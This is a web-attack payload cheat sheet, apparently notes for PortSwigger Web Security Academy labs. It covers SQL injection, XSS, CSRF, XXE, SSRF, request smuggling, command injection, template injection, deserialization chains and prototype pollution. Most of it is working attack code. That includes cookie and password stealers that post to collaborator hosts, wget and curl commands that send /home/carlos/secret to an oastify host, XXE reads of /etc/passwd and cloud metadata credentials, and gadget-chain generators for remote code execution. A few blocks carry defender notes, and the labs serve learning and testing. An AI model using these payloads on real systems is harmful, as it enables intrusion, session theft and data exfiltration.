Payloads
SQLi
UNION SQLi
#clause bypass
'+OR+1=1--
#login bypass
administrator'--
#union detection
'+ORDER+BY+1--
'+ORDER+BY+2--
'+ORDER+BY+3--
'+UNION+SELECT+NULL,NULL--
'+UNION+SELECT+'abcdef',NULL,NULL--
#Oracle version
'+UNION+SELECT+BANNER,+NULL+FROM+v$version--
#MySQL and Microsoft version
'+UNION+SELECT+@@version,+NULL#
#Table names
'+UNION+SELECT+table_name,+NULL+FROM+information_schema.tables--
'+UNION+SELECT+column_name,+NULL+FROM+information_schema.columns+WHERE+table_name='users_abcdef'--
#Table names (Oracle)
'+UNION+SELECT+table_name,NULL+FROM+all_tables--
'+UNION+SELECT+column_name,NULL+FROM+all_tab_columns+WHERE+table_name='USERS_ABCDEF'--
#More columns in one
'+UNION+SELECT+NULL,username||'~'||password+FROM+users--
Blind SQLi
#Conditional response
TrackingId=xyz' AND '1'='1
TrackingId=xyz' AND '1'='2
#Table exist
TrackingId=xyz' AND (SELECT 'a' FROM users LIMIT 1)='a
#User exist
TrackingId=xyz' AND (SELECT 'a' FROM users WHERE username='administrator')='a
#Password length
TrackingId=xyz' AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)>1)='a
#Password guess
TrackingId=xyz' AND (SELECT SUBSTRING(password,2,1) FROM users WHERE username='administrator')='a
Blind error based SQLi
TrackingId=xyz'||(SELECT '')||'
TrackingId=xyz'||(SELECT '' FROM dual)||
TrackingId=xyz'||(SELECT '' FROM users WHERE ROWNUM = 1)||'
TrackingId=xyz'||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM dual)||'
TrackingId=xyz'||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
TrackingId=xyz'||(SELECT CASE WHEN LENGTH(password)>1 THEN to_char(1/0) ELSE '' END FROM users WHERE username='administrator')||'
TrackingId=xyz'||(SELECT CASE WHEN LENGTH(password)>3 THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
TrackingId=xyz'||(SELECT CASE WHEN SUBSTR(password,1,1)='a' THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
Visible Error
TrackingId=ogAZZfxtOKUELbuJ' AND CAST((SELECT 1) AS int)--
TrackingId=ogAZZfxtOKUELbuJ' AND 1=CAST((SELECT username FROM users) AS int)--
TrackingId=' AND 1=CAST((SELECT username FROM users LIMIT 1) AS int)--
TrackingId=' AND 1=CAST((SELECT password FROM users LIMIT 1) AS int)--
Blind Time-based
TrackingId=x'||pg_sleep(10)--
select 1 from pg_sleep(5)
;(select 1 from pg_sleep(5))
||(select 1 from pg_sleep(5))
TrackingId=x'%3BSELECT+CASE+WHEN+(1=1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END--
TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+LENGTH(password)>1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+SUBSTRING(password,1,1)='a')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
Out of Band Interactions
TrackingId=x'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//BURP-COLLABORATOR-SUBDOMAIN/">+%25remote%3b]>'),'/l')+FROM+dual--
TrackingId=x'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//'||(SELECT+password+FROM+users+WHERE+username%3d'administrator')||'.BURP-COLLABORATOR-SUBDOMAIN/">+%25remote%3b]>'),'/l')+FROM+dual--
SQLI inside XML
<storeId><@hex_entities>1 UNION SELECT username || '~' || password FROM users<@/hex_entities></storeId>
XSS
DOM-based XSS
#document.write sink
product?productId=1&storeId="></select><img%20src=1%20onerror=alert(1)>
#document.write sink
"><svg onload=alert(1)>
#innerHTML sink
<img src=1 onerror=alert(1)>
#jQuery href sink
javascript:alert(document.cookie)
#jQuery selector sink
<iframe src="https://lab.web-security-academy.net/#" onload="this.src+='<img src=x onerror=print()>'"></iframe>
#angular ng-app
{{$on.constructor('alert(1)')()}}
1&toString().constructor.prototype.charAt%3d[].join;[1]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)=1
#json sink
\"-alert(1)}//
#bypass angle brackets replace
<><img src=1 onerror=alert(1)>
#open redirection
https://lab.web-security-academy.net/post?postId=4&url=https://YOUR-EXPLOIT-SERVER-ID.exploit-server.net/
#cookie manipulation
<iframe src="https://YOUR-LAB-ID.web-security-academy.net/product?productId=1&'><script>print()</script>" onload="if(!window.x)this.src='https://YOUR-LAB-ID.web-security-academy.net';window.x=1;">
#WAF bypass
"-alert(window["document"]["cookie"])-"
"-window["alert"](window["document"]["cookie"])-"
"-self["alert"](self["document"]["cookie"])-"
The eval() method evaluates or executes its argument.
atob() and btoa() are functions for decoding from and encoding to base64-format strings.
If eval() is blocked, alternatives:
setTimeout("code")
setInterval("code")
setImmediate("code")
Function("code")()
XSS web messages
<iframe src="https://lab.web-security-academy.net/" onload="this.contentWindow.postMessage('<img src=1 onerror=print()>','*')">
<iframe src="https://YOUR-LAB-ID.web-security-academy.net/" onload="this.contentWindow.postMessage('javascript:print()//http:','*')">
#JSON.parse() sink of web msg
<iframe src=https://YOUR-LAB-ID.web-security-academy.net/ onload='this.contentWindow.postMessage("{\"type\":\"load-channel\",\"url\":\"javascript:print()\"}","*")'>
Reflected
#js string with angle brackets
'-alert(1)-'
blez';alert(1);let myvar='test
#tag attribute with angle brackets <>
test" onmouseover="alert(1)
#blocked tags and attrs
<iframe src="https://lab.web-security-academy.net/?search=%22%3E%3Cbody%20onresize=print()%3E" onload=this.style.width='100px'>
#custom tags
<script>
location = 'https://lab.web-security-academy.net/?search=%3Cxss+id%3Dx+onfocus%3Dalert%28document.cookie%29%20tabindex=1%3E#x';
</script>
#svg tag allowed
https://YOUR-LAB-ID.web-security-academy.net/?search=%22%3E%3Csvg%3E%3Canimatetransform%20onbegin=alert(1)%3E
#single quote and backslash escape
</script><script>alert(1)</script>
#js with angle brackets, double quotes and single quotes escaped
\'-alert(1)//
#all quotes backslash but backticks js literal
${alert(1)}
\'-alert(1)//
fuzzer\';console.log(12345);//
fuzzer\';alert(`Testing The backtick a typographical mark used mainly in computing`);//
Stored
#href with double quotes
javascript:alert(1)
http://foo?'-alert(1)-'
#replacing angle brackets bypass
<><img src=1 onerror=alert(1)>
XSS stealers
#cookie stealer
<script>
// Sends the page's document.cookie to the collaborator host as a POST body.
// Defender note: an HttpOnly flag on the session cookie keeps it out of
// document.cookie, and a CSP connect-src directive blocks this outbound fetch;
// the root fix is the injection point that lets the script run at all.
fetch('https://BURP-COLLABORATOR-SUBDOMAIN', {
method: 'POST',
mode: 'no-cors',
body:document.cookie
});
</script>
#password stealer
<!-- Injected form fields: when the password field changes and is non-empty, its
     onchange handler POSTs username.value + ':' + this.value to the collaborator
     host. Presumably relies on browser/password-manager autofill to populate
     the fields (not visible here -- confirm). Defender note: strip event-handler
     attributes and form elements from user-supplied HTML, and set a CSP that
     disallows inline handlers and restricts connect-src. -->
<input name=username id=username>
<input type=password name=password onchange="if(this.value.length)fetch('https://BURP-COLLABORATOR-SUBDOMAIN',{
method:'POST',
mode: 'no-cors',
body:username.value+':'+this.value
});">
XSS to CSRF
<script>
// Fetches /my-account, extracts the csrf token from the HTML with a regex, and
// POSTs a change-email request carrying that token.
// Defender note: a CSRF token cannot protect against script already running on
// the same origin; the mitigation is fixing the XSS itself (contextual output
// encoding, a CSP without unsafe-inline).
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get','/my-account',true);
req.send();
// Runs once /my-account has loaded; `this` is the completed XMLHttpRequest.
function handleResponse() {
var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
var changeReq = new XMLHttpRequest();
changeReq.open('post', '/my-account/change-email', true);
changeReq.send('csrf='+token+'&email=test@test.com')
};
</script>
CSRF
<!-- Auto-submitted cross-site POST to change-email; the form carries no CSRF
     token field. Defender note: require a per-session, unpredictable CSRF token
     validated server-side, and mark the session cookie SameSite=Lax or Strict. -->
<form method="POST" action="https://YOUR-LAB-ID.web-security-academy.net/my-account/change-email">
<input type="hidden" name="email" value="blez@b.b">
</form>
<script>
document.forms[0].submit();
</script>
#Method changed to GET
<form action="https://YOUR-LAB-ID.web-security-academy.net/my-account/change-email">
<input type="hidden" name="email" value="blez@b.b">
</form>
<script>
document.forms[0].submit();
</script>
#token tied to non-session cookie
<form method="POST" action="https://YOUR-LAB-ID.web-security-academy.net/my-account/change-email">
<input type="hidden" name="email" value="blez@b.b">
</form>
<script>
<img src="https://YOUR-LAB-ID.web-security-academy.net/?search=test%0d%0aSet-Cookie:%20csrfKey=YOUR-KEY%3b%20SameSite=None" onerror="document.forms[0].submit()">
</script>
#token duplicated in cookie
<img src="https://YOUR-LAB-ID.web-security-academy.net/?search=test%0d%0aSet-Cookie:%20csrf=fake%3b%20SameSite=None" onerror="document.forms[0].submit();"/>
#SameSite Lax Bypass by method override
<script>
// Top-level GET navigation that asks the server to treat the request as a POST
// via the _method=POST query parameter.
// Defender note: state-changing endpoints should not honour method-override
// parameters, and SameSite=Lax on its own is not a CSRF defence -- pair it with
// a validated CSRF token.
document.location = "https://YOUR-LAB-ID.web-security-academy.net/my-account/change-email?email=pwned@web-security-academy.net&_method=POST";
</script>
#SameSite Strict Bypass via redirect
<script>
document.location = "https://YOUR-LAB-ID.web-security-academy.net/post/comment/confirmation?postId=1/../../my-account/change-email?email=pwned%40web-security-academy.net%26submit=1";
</script>
#SameSite Lax bypass by cookie refresh
<!-- On the user's first click this opens /social-login in a new window and,
     5 s later, submits the hidden change-email form. The header above frames
     it as a SameSite=Lax bypass via cookie refresh; the exact browser rule
     relied on is not visible here. Defender note: a server-validated CSRF token
     on change-email holds regardless of cookie attributes. -->
<form method="POST" action="https://YOUR-LAB-ID.web-security-academy.net/my-account/change-email">
<input type="hidden" name="email" value="pwned@portswigger.net">
</form>
<p>Click anywhere on the page</p>
<script>
window.onclick = () => {
window.open('https://YOUR-LAB-ID.web-security-academy.net/social-login');
setTimeout(changeEmail, 5000);
}
// Submits the hidden form once the timeout set in the click handler fires.
function changeEmail() {
document.forms[0].submit();
}
</script>
#bypass Referer validation with a header on the exploit server
<meta name="referrer" content="no-referrer">
#Bypass broken Referer validation
Referrer-Policy: unsafe-url
history.pushState("", "", "/?YOUR-LAB-ID.web-security-academy.net")
CSWSH - Cross-Site WebSocket Hijacking
#script to start a websocket chat
<script>
// Opens a WebSocket to the lab's /chat endpoint from a foreign origin, sends
// "READY", and forwards every message received to the collaborator host.
// Defender note: the WebSocket handshake must check the Origin header against
// an allow-list, and the session cookie should carry a SameSite attribute so a
// cross-site page cannot open an authenticated socket in the first place.
var ws = new WebSocket('wss://YOUR-LAB-ID.web-security-academy.net/chat');
ws.onopen = function() {
ws.send("READY");
};
ws.onmessage = function(event) {
fetch('https://YOUR-COLLABORATOR-PAYLOAD.oastify.com', {method: 'POST', mode: 'no-cors', body: event.data});
};
</script>
<script>
document.location = "https://cms-YOUR-LAB-ID.web-security-academy.net/login?username=YOUR-URL-ENCODED-CSWSH-SCRIPT&password=anything";
</script>
CORS
#Access-Control-Allow-Credentials reflect Origin
<script>
// Credentialed GET to /accountDetails, then appends the response body to
// /log?key= on the current (exploit-server) origin.
// Defender note: never reflect an arbitrary Origin into
// Access-Control-Allow-Origin while also sending
// Access-Control-Allow-Credentials: true -- compare Origin against a fixed
// allow-list instead.
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','YOUR-LAB-ID.web-security-academy.net/accountDetails',true);
req.withCredentials = true;
req.send();
// `this` is the XMLHttpRequest that completed.
function reqListener() {
location='/log?key='+this.responseText;
};
</script>
#CORS with null origin: a sandboxed iframe is used because it generates a request with a null Origin
<iframe sandbox="allow-scripts allow-top-navigation allow-forms" srcdoc="<script>
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','YOUR-LAB-ID.web-security-academy.net/accountDetails',true);
req.withCredentials = true;
req.send();
function reqListener() {
location='YOUR-EXPLOIT-SERVER-ID.exploit-server.net/log?key='+encodeURIComponent(this.responseText);
};
</script>"></iframe>
#reflected subdomain with XSS in productID
<script>
document.location="http://stock.YOUR-LAB-ID.web-security-academy.net/?productId=4<script>var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://YOUR-LAB-ID.web-security-academy.net/accountDetails',true); req.withCredentials = true;req.send();function reqListener() {location='https://YOUR-EXPLOIT-SERVER-ID.exploit-server.net/log?key='%2bthis.responseText; };%3c/script>&storeId=1"
</script>
XXE
#get file with external entities
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<productID>&xxe;</productID>
#SSRF attack to public address
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin"> ]>
<productID>&xxe;</productID>
Blind XXE
#out of band blind xxe
<!DOCTYPE stockCheck [ <!ENTITY xxe SYSTEM "http://BURP-COLLABORATOR-SUBDOMAIN"> ]>
<productID>&xxe;</productID>
#out of band parameter entities
<!DOCTYPE stockCheck [<!ENTITY % xxe SYSTEM "http://BURP-COLLABORATOR-SUBDOMAIN"> %xxe; ]>
External DTD XXE
#malicious DTD out of band exfiltration
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY % exfil SYSTEM 'http://BURP-COLLABORATOR-SUBDOMAIN/?x=%file;'>">
%eval;
%exfil;
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "YOUR-DTD-URL"> %xxe;]>
#Error based
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % exfil SYSTEM 'file:///invalid/%file;'>">
%eval;
%exfil;
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "YOUR-DTD-URL"> %xxe;]>
XInclude injection
<productID>
<foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></foo>
</productID>
XXE image upload
#create a local SVG with the following content
<?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]><svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="16" x="0" y="16">&xxe;</text></svg>
SSRF
#try to change api to localhost
http://localhost/admin
#try call api on ip
http://192.168.0.1:6566/admin
http://127.0.0.1/admin
http://127.1/admin
#obfuscation of 'a'
http://127.1/%2561dmin
#open redirection ssrf
/product/nextProduct?path=http://192.168.0.12:6566/admin
Request Smuggling
CL.TE
POST / HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 35
Transfer-Encoding: chunked
0
GET /404 HTTP/1.1
X-Ignore: X
-------------------------------------------------------------------------------------
#Bypass front-end control
POST / HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 116
Transfer-Encoding: chunked
0
GET /admin HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 10
x=
-------------------------------------------------------------------------------------
#The front-end server adds an HTTP header to incoming requests containing their IP address
#host rewriting
POST / HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 166
Transfer-Encoding: chunked
0
GET /admin/delete?username=carlos HTTP/1.1
X-abcdef-Ip: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 10
Connection: close
x=1
-------------------------------------------------------------------------------------
#Steal user cookie
POST / HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 256
Transfer-Encoding: chunked
0
POST /post/comment HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 400
Cookie: session=your-session-token
csrf=your-csrf-token&postId=5&name=Carlos+Montoya&email=carlos%40normal-user.net&website=&comment=test
-------------------------------------------------------------------------------------
#smuggling request with xss inside the header
POST / HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 150
Transfer-Encoding: chunked
0
GET /post?postId=5 HTTP/1.1
User-Agent: a"/><script>document.location='http://OASTIFY.COM/?cookiestealer='+document.cookie;</script>
Content-Type: application/x-www-form-urlencoded
Content-Length: 5
x=1
TE.CL
POST / HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-length: 4
Transfer-Encoding: chunked
5e
POST /404 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
x=1
0
-------------------------------------------------------------------------------------
#Bypass frontend control
POST / HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Content-length: 4
Transfer-Encoding: chunked
87
GET /admin HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
x=1
0
H2.CL
Send the request a few times and confirm that you receive a redirect to the exploit server.
Resend the request and wait for 10 seconds or so.
Go to the exploit server and check the access log. If you see a
GET /resources/
request from the victim, this indicates that your request smuggling attack was successful
POST / HTTP/2
Host: YOUR-LAB-ID.web-security-academy.net
Content-Length: 0
GET /resources HTTP/1.1
Host: YOUR-EXPLOIT-SERVER-ID.exploit-server.net
Content-Length: 5
x=1
H2.TE
Send the request to poison the response queue. You will receive the 404 response to your own request.
Wait for around 5 seconds, then send the request again to fetch an arbitrary response.
Repeat this process until you capture a 302 response containing the admin's new post-login session cookie.
Copy the session cookie and use it to send the following request:
GET /admin HTTP/2
Host: YOUR-LAB-ID.web-security-academy.net
Cookie: session=STOLEN-SESSION-COOKIE
POST /x HTTP/2
Host: YOUR-LAB-ID.web-security-academy.net
Transfer-Encoding: chunked
0
GET /x HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
H2 CRLF Injection
Note: enable the Allow HTTP/2 ALPN override option and change the body of the HTTP/2 request to the POST request below.
0
POST / HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Cookie: session=HACKER-SESSION-COOKIE
Content-Length: 800
search=nutty
H2.TE desync v10a h2path
POST /x HTTP/2
Host: TARGET.net
Transfer-Encoding: chunked
0
GET /x HTTP/1.1
Host: TARGET.web-security-academy.net\r\n
\r\n
CL.0
Using the drop-down menu next to the Send button, change the send mode to Send group in sequence (single connection).
POST /resources/images/blog.svg HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Cookie: session=YOUR-SESSION-COOKIE
Connection: keep-alive
Content-Length: CORRECT
GET /admin HTTP/1.1
Foo: x
OS cmd injection
storeID=1|whoami
email=x||nslookup+x.BURP-COLLABORATOR-SUBDOMAIN||
email=||$(curl $(cat /home/carlos/secret).OASTIFY.COM)||
#path traversal allowed
||pwd>output.txt||
||echo>>output.txt||
||cat+/etc/hosts>>/var/www/images/output.txt||
||echo>>output.txt||
||ls+-al>>/var/www/images/output.txt||
||echo>>output.txt||
||whoami>>/var/www/images/output.txt||
SSTI
#these will throw an error
${{<%[%'"}}%\.
${{<%[%'"}}%\.,
}}{{7*7}}
{{fuzzer}}
${fuzzer}
${{fuzzer}}
${7*7}
<%= 7*7 %>
${{7*7}}
#{7*7}
${foobar}
{% debug %}
#ERB
<%= system("cat+/home/carlos/secret") %>
https://YOUR-LAB-ID.web-security-academy.net/?message=<%25+system("cat+/home/carlos/secret")+%25>
#Tornado
POST /my-account/change-blog-post-author-display HTTP/2
Host: TARGET.net
Cookie: session=fenXl1hfjQBgGkrcmJoK7D8RU3eHkkCd
blog-post-author-display=user.name}}{%25+import+os+%25}{{os.system('cat%20/home/carlos/secret')
#FreeMarker
${foobar}
<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("cat /home/carlos/secret") }
#Handlebars, URL-encoded as a URL parameter
wrtz{{#with "s" as |string|}}
{{#with "e"}}
{{#with split as |conslist|}}
{{this.pop}}
{{this.push (lookup string.sub "constructor")}}
{{this.pop}}
{{#with string.split as |codelist|}}
{{this.pop}}
{{this.push "return require('child_process').exec('wget https://OASTIFY.COM --post-file=/home/carlos/secret');"}}
{{this.pop}}
{{#each conslist}}
{{#with (string.sub.apply 0 codelist)}}
{{this}}
{{/with}}
{{/each}}
{{/with}}
{{/with}}
{{/with}}
{{/with}}
Path Traversal
/home/carlos/secret
....//....//....//....//home//carlos//secret
..%252f..%252f..%252fhome/carlos/secret
/var/www/images/../../../home/carlos/secret
../../../home/carlos/secret%00.png
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fhome%252fcarlos%252fsecret
/etc/passwd
....//....//....//....//etc//passwd
..%252f..%252f..%252fetc/passwd
/var/www/images/../../../etc/passwd
../../../etc/passwd%00.png
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd
Authentication
Web Sockets
<script>
// Opens a WebSocket to the given URL, sends "READY", and forwards every message
// received to the collaborator URL.
// Defender note: validate the Origin header on the WebSocket handshake against
// an allow-list and use SameSite session cookies so a cross-site page cannot
// establish an authenticated socket.
var ws = new WebSocket('wss://your-websocket-url');
ws.onopen = function() {
ws.send("READY");
};
ws.onmessage = function(event) {
fetch('https://your-collaborator-url', {method: 'POST', mode: 'no-cors', body: event.data});
};
</script>
oAuth
#open redirection oauth steal token
<script>
// First load (no URL fragment): start an OAuth flow with response_type=token
// whose redirect_uri points at the lab callback but traverses (/../) to a
// redirecting endpoint that forwards to the exploit server.
// Second load (fragment present): copy the fragment -- which in the implicit
// flow carries the access token -- into the query string so it reaches the
// exploit server.
// Defender note: validate redirect_uri by exact string match against the
// registered value (no path normalisation or open redirects on the allowed
// path), and prefer the authorization-code flow with PKCE over
// response_type=token.
if (!document.location.hash) {
window.location = 'https://oauth-YOUR-OAUTH-SERVER-ID.oauth-server.net/auth?client_id=YOUR-LAB-CLIENT-ID&redirect_uri=https://YOUR-LAB-ID.web-security-academy.net/oauth-callback/../post/next?path=https://YOUR-EXPLOIT-SERVER-ID.exploit-server.net/exploit/&response_type=token&nonce=399721827&scope=openid%20profile%20email'
} else {
window.location = '/?'+document.location.hash.substr(1)
}
</script>
Deserialization
#JAVA
java -jar /opt/ysoserial/ysoserial.jar CommonsCollections3 'wget http:// --post-file=/home/carlos/secret' | base64 -w 0
java -jar /opt/ysoserial/ysoserial.jar CommonsCollections4 'wget http://5v1foaz3jyqn51jftzizmb5rtiz9nzbo.oastify.com --post-file=/home/carlos/secret' | base64 -w 0
#PHP
#path to find a secret
/cgi-bin/phpinfo.php
#command creation
/opt/phpggc/phpggc Symfony/RCE4 exec 'wget http://5v1foaz3jyqn51jftzizmb5rtiz9nzbo.oastify.com --post-file=/home/carlos/secret' | base64 -w 0
#payload creation
<?php
// Builds a URL-encoded cookie value {"token":<object>,"sig_hmac_sha1":<hmac>}
// where the HMAC-SHA1 is computed over $object with $secretKey. $object is
// left empty here; presumably the base64 output of the phpggc command above is
// pasted in -- confirm.
// Defender note: the signature only protects integrity while the key stays
// secret; this key presumably came from a leaked configuration (the listing
// above points at phpinfo.php -- confirm). Rotate exposed keys, and never pass
// even a correctly signed value to unserialize() without an allowed_classes
// list.
$object = "";
$secretKey = "q9ekwze228qxcdd9uvfjxxkfsipzq9ul";
$cookie = urlencode('{"token":"' . $object . '","sig_hmac_sha1":"' . hash_hmac('sha1', $object, $secretKey) . '"}');
echo $cookie;
#RUBY script -
# Autoload the required classes
Gem::SpecFetcher
Gem::Installer
# prevent the payload from running when we Marshal.dump it
module Gem
class Requirement
# Custom serialiser: only @requirements is written when this object is dumped.
def marshal_dump
[@requirements]
end
end
end
# Defender note: the objects built below only matter to an application that
# calls Marshal.load on attacker-controlled bytes (the base64 text printed at
# the end). The wget string placed in @git_set is the command the chain is
# built to run (inferred -- confirm against the Ruby/RubyGems versions in use).
# Mitigation: never Marshal.load untrusted input; use JSON or YAML.safe_load,
# and sign or encrypt any serialised cookie or token.
wa1 = Net::WriteAdapter.new(Kernel, :system)
rs = Gem::RequestSet.allocate
rs.instance_variable_set('@sets', wa1)
rs.instance_variable_set('@git_set', "wget http://5v1foaz3jyqn51jftzizmb5rtiz9nzbo.oastify.com --post-file=/home/carlos/secret")
wa2 = Net::WriteAdapter.new(rs, :resolve)
i = Gem::Package::TarReader::Entry.allocate
i.instance_variable_set('@read', 0)
i.instance_variable_set('@header', "aaa")
n = Net::BufferedIO.allocate
n.instance_variable_set('@io', i)
n.instance_variable_set('@debug_output', wa2)
t = Gem::Package::TarReader.allocate
t.instance_variable_set('@io', n)
r = Gem::Requirement.allocate
r.instance_variable_set('@requirements', t)
payload = Marshal.dump([Gem::SpecFetcher, Gem::Installer, r])
# Base64 is used without a visible `require 'base64'`; assumes it is already loaded.
puts Base64.encode64(payload)
JWT
https://github.com/wallarm/jwt-secrets/blob/master/jwt.secrets.list
#crack JWT secret
hashcat -a 0 -m 16500 <YOUR-JWT> /path/to/jwt.secrets.list
Prototype pollution
#bypass sanitization
/?__pro__proto__to__[foo]=bar
/?__pro__proto__to__.foo=bar
/?constconstructorructor[protoprototypetype][foo]=bar
/?constconstructorructor.protoprototypetype.foo=bar
<script>
// Navigates to the lab with a URL fragment that sets a property (hitCallback)
// through the __proto__ key, i.e. client-side prototype pollution via the
// fragment parser.
// Defender note: when merging URL parameters into objects, reject or
// allow-list keys such as __proto__, constructor and prototype, or build the
// target with Object.create(null); Object.freeze(Object.prototype) is a blunt
// but effective guard.
location="https://YOUR-LAB-ID.web-security-academy.net/#__proto__[hitCallback]=alert%28document.cookie%29"
</script>
"__proto__": {
"isAdmin":true
}
#server side prototype pollution
"constructor": {
"prototype": {
"isAdmin":true
}
}
"__proto__": {
"execArgv":[
"--eval=require('child_process').execSync('cat /home/carlos/secret')"
]
}